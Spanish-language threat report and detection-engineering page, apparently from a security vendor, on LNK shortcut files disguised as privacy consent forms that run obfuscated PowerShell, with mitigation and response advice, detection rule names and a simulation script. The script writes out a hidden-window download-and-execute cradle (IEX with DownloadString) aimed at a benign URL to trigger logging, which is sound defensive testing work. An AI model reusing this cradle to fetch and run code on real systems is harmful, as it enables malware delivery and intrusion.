¿Qué había realmente dentro del archivo de acceso directo disfrazado de formulario de consentimiento de privacidad?
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas están distribuyendo archivos LNK maliciosos disfrazados como formularios de consentimiento de privacidad para engañar a los usuarios y hacer que los abran. Cuando se ejecutan, estos archivos de acceso directo lanzan comandos de PowerShell ofuscados que recuperan y ejecutan cargas útiles adicionales utilizando técnicas sin archivos. La cadena de ataque está diseñada para robar información y desplegar un cargador de puerta trasera que ayuda a preservar el acceso y la persistencia.
Investigación
La investigación mostró que los archivos LNK incrustan código de PowerShell ofuscado responsable de descargar scripts de seguimiento. Estos scripts secundarios incluyen un descargador que extrae cargas útiles de servicios web legítimos y un cargador que los ejecuta directamente en la memoria. El actor de amenazas también abusa del Programador de tareas de Windows para obtener persistencia y utiliza documentos señuelo para que la actividad maliciosa parezca legítima.
Mitigación
Las organizaciones deben implementar una verificación estricta de las extensiones de archivo y advertir a los usuarios sobre archivos LNK disfrazados como documentos regulares. Los equipos de seguridad deben monitorear de cerca la actividad del Programador de tareas, los registros de ejecución de PowerShell y las conexiones de red salientes. También se debe capacitar a los usuarios para validar tanto al remitente como la ruta de entrega de cualquier archivo entrante antes de abrirlo.
Respuesta
Si se detecta esta actividad, los administradores deben revisar inmediatamente las entradas sospechosas en el Programador de tareas y la creación inusual de scripts de PowerShell en directorios accesibles por el usuario. Los registros de PowerShell deben ser analizados, y las conexiones externas deben ser rastreadas, especialmente aquellas relacionadas con plataformas en la nube legítimas o servicios de almacenamiento web. A continuación, se debe realizar una investigación forense completa sobre cualquier script malicioso identificado y tráfico de red no autorizado.
Flujo de Ataque
Detecciones
Posible Descubrimiento de Información del Sistema Usando el Módulo Wmi de Powershell (via powershell)
Ver
Posibles Indicadores de Ofuscación de Powershell (via powershell)
Ver
Ejecución de Archivo LNK Malicioso que Conduce a Descarga y Conexiones Externas [Conexión de Red de Windows]
Ver
Ejecución de Archivo LNK Malicioso y Persistencia a través del Programador de Tareas [Creación de Procesos de Windows]
Ver
Ejecución de Archivo LNK Malicioso que Ejecuta PowerShell Ofuscado [Windows Powershell]
Ver
Ejecución de Simulación
Prerrequisito: La Verificación Previa de Telemetría & Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y el relato DEBEN reflejar directamente los TTP identificados y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a diagnósticos erróneos.
-
Narrativa del Ataque y Comandos: El adversario busca establecer un acceso inicial y descargar una carga útil de malware de segunda fase. Para evitar la detección por escáneres de archivos simples, utilizan un archivo LNK (Acceso Directo). Este archivo LNK está diseñado para ejecutar
powershell.exeen una ventana oculta. El comando pasado a PowerShell usaInvoke-ExpressionandDownloadStringpara obtener un script desde una URL remota. Esto imita los ataques reales «Living-off-the-Land» (LotL) donde se utilizan binarios legítimos para realizar acciones maliciosas, con el objetivo de evadir los antivirus tradicionales basados en firmas. -
Script de Prueba de Regresión:
# 1. Defina la URL de destino (usando un sitio benigno para la prueba) $url = "https://www.google.com" # 2. Cree la cadena de carga útil de PowerShell maliciosa # Esta cadena está diseñada para activar la detección 'DownloadString' e 'Invoke-Expression' $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')" # 3. Cree contenido de archivo LNK falso (Simulado) # En un ataque real, esto sería un archivo .lnk binario. # Aquí ejecutamos el comando directamente para asegurar que se genere el registro ScriptBlock para la validación. Write-Host "[+] Simulando ejecución de PowerShell maliciosa a través de carga útil LNK..." powershell.exe -WindowStyle Hidden -Command $payload Write-Host "[+] Comando de simulación ejecutado. Verifique el ID de Evento 4104." -
Comandos de Limpieza:
# Elimine cualquier artefacto si se crearon archivos Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue Write-Host "[+] Limpieza completa."